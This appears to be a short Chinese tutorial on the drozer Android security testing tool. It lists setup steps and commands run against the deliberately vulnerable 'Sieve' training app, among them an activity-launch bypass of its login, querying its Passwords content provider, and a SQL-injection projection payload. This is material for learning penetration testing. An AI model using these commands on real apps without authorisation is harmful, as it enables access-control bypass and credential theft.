神器之drozer使用

使用过程
电脑和模拟器(手机)都安装drozer,使用手机的话,需要数据线连接电脑,并启用usb调试模式

模拟器(手机)端开启drozer

电脑端使用adb端口转发:adb forward tcp:31415 tcp:31415

进行连接:drozer.bat console connect

常用命令
获取所有包名:run app.package.list

获取带有sieve的包名:run app.package.list –f sieve

查看信息:run app.package.info –a com.mwr.example.sieve

查看攻击面:run app.package.attacksurface com.mwr.example.sieve

查看activity漏洞点:run app.activity.info -a com.mwr.example.sieve

activity越权:run app.activity.start –component com.mwr.example.sieve com.mwr.example.sieve.PWLi

查看service漏洞:run app.service.info -a com.mwr.example.sieve

查看Broadcast Receiver漏洞:run app.broadcast.info –a com.mwr.example.sieve

查看Content Provider漏洞点:run app.provider.info -a com.mwr.example.sieve

扫描数据库信息:run scanner.provider.finduris -a com.mwr.example.sieve

查看数据信息: run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

执行sql语句:run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ –projection “* FROM SQLITE_MASTER WHERE type=’table’;–”

扫描注入:run scanner.provider.injection -a com.mwr.example.sieve

扫描目录遍历:run scanner.provider.traversal -a com.mwr.example.sieve

参与评论